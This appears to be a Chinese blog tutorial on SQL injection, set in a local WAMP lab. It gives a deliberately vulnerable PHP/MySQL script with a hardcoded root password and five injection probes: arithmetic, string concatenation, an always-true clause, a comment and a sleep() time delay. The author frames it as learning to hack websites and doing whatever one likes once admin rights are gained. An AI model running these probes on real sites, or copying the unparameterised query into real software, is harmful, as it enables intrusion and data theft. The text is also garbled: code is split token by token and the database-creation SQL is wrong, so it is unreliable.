?
?
?
看完《sql注入攻擊與防御 第2版》后,發現原來自己也能黑網站了,就一個字:太爽了。
?
?
?
簡單總結一下入侵步驟:
1、確定是否有 sql 注入漏洞
2、確定數據庫類型
3、組合 sql 語句,實施滲透
4、獲取最高權限后,想怎么玩就怎么玩
?
?
?
?
?
學習sql注入漏洞,需要的材料:
瀏覽器?????????? X1
wamp
集成包? X1
php
腳本一個? X1
數據庫一個???? X1
php腳本內容:
1
<
?php
2
//
獲取數據
3
$id
=
empty($_GET
[
'id'
]
)?"
NULL
":$_GET
[
'id'
]
;
4
$name
=
empty($_GET
[
'name'
]
)?"
NULL
":$_GET
[
'name'
]
;
5
//
連接數據庫
6
$connect
=
mysql_connect(
'
localhost
'
,
'
root
'
,
'
123456
'
);
7
//
選擇數據庫
8
mysql_select_db(
'
new
'
,$connect);
9
//
組合sql語句
10
$sql
=
"
SELECT
*
FROM
one
where
id
=
{$id}
or
name
=
'
{$name}
'
";
11
//
執行sql語句
12
$result
=
mysql_query($sql);
13
//
顯示數據結果
14
while
($row
=
mysql_fetch_array($result)) {
15
echo "
<
pre
>
";
16
print_r($row);
17
echo "
</
pre
>
";
18
}
?
創建數據庫和數據表
1
--
創建數據庫
2
Create
databases
if
exists
new;
3
--
創建數據表
4
create
table
one(
5
id
int
not
null
auto_increment
primary
key
,
6
name
varchar
(
10
)
not
null
,
7
pwd
varchar
(
10
)
not
null
,
8
price
int
not
null
9
)engine
=
myisam
default
charset
=
utf8;
?
?
?以下將用5種方法判斷是否有sql注入漏洞
1、根據運算符判斷
2、根據連接字符串判斷
3、根據內聯sql判斷
4、根據sql注釋符判斷
5、根據時間延遲判斷
?
?
?
?
以下例子是判斷是否有sql注入的測試。
?
?
一、根據 < 運算符 > 判斷是否有 sql 漏洞。實現步驟如下:
正常運行流程:
1、在瀏覽器輸入地址
Sql 語句: SELECT?*?FROM?one?where?id=1?or?name='NULL'
2、查看瀏覽器輸出結果,將發現 id 為 1 的數據被輸出
非正常運行流程,使用運算符:
1 、在瀏覽器輸入地址
?
Sql 語句: SELECT?*?FROM?one?where?id=4-1?or?name='NULL'
2、查看瀏覽器輸出結果,將發現 id 為 3 的數據被輸出。因為 sql 執行了 4-1 的運算了。
?
?
二、根據 < 字符串 > 判斷是否有 sql 漏洞。實現步驟如下:
正常運行流程:
? 1 、在瀏覽器輸入地址
? ?
Sql 語句: SELECT?*?FROM?one?where?id=NULL?or?name='hello'
2、查看瀏覽器輸出結果,將發現 name 為 hello 的數據被輸出
非正常運行流暢,使用字符串連接
1、在瀏覽器輸入地址
?
Sql 語句: SELECT?*?FROM?one?where?id=NULL?or?name='he'?'llo'
2 、查看瀏覽器輸出結果,將發現 name 為 hello 的數據被輸出。因為 sql 執行了: 字符串連接操作。
?
?
三、根據 < 字符串內聯 > 判斷是否有 sql 注入漏洞。實現步驟如下:
正常運行流暢:
1 、在瀏覽器輸入地址
?
Sql 語句: SELECT?*?FROM?one?where?id=NULL?or?name='hello'
2、查看瀏覽器輸出結果,將發現 name 為 hello 的數據被輸出。
非正常運行流程:
1 、在瀏覽輸入地址
?
Sql 語句: SELECT?*?FROM?one?where?id=NULL?or?name='he'?'llo'?or?'1'='1'
2 、查看瀏覽器輸出結果,將發現所有數據被輸出。
?
?
四、使用 <sql 的注釋符號 > 判斷是否有 sql 輸入漏洞
正常運行流程:
1、在瀏覽器輸入地址
?
Sql 語句: SELECT?*?FROM?one?where?id=3?or?name='NULL'
2、查看瀏覽器輸出結果,將發現 id 為 3 的數據被顯示出來
非正常運行流程:
1、在瀏覽器輸入地址
?
Sql 語句: SELECT?*?FROM?one?where?id=3--?or?name='NULL'
2、查看瀏覽器輸出結果,將發現 id 為 3 的數據被顯示出來
?
?
五、使用 < 時間延遲 > 判斷是否有 sql 注入漏洞
正常運行流程:
1、在瀏覽器輸入地址
?
Sql 語句: SELECT?*?FROM?one?where?id=3?or?name='NULL'
2 、查看瀏覽器輸出結果,將發現 id 為 3 的數據被顯示出來
非正常運行流程:
1、在瀏覽器輸入地址
Sql 語句: SELECT?*?FROM?one?where?id=3?or?sleep(10)?or?name='NULL'
2 、這時瀏覽器返回結果,會有明顯的延遲
?
?
?
?
備注:該測試用到的數據庫為mysql數據庫,sql語句都是針對mysql。其他數據庫的測試方式大同小異,只要思路正確就一切ok。
備注:sqlmap工具聽說挺不錯,可以試試。
?
更多文章、技術交流、商務合作、聯系博主
微信掃碼或搜索:z360901061
微信掃一掃加我為好友
QQ號聯系: 360901061
您的支持是博主寫作最大的動力,如果您喜歡我的文章,感覺我的文章對您有幫助,請用微信掃描下面二維碼支持博主2元、5元、10元、20元等您想捐的金額吧,狠狠點擊下面給點支持吧,站長非常感激您!手機微信長按不能支付解決辦法:請將微信支付二維碼保存到相冊,切換到微信,然后點擊微信右上角掃一掃功能,選擇支付二維碼完成支付。
【本文對您有幫助就好】元

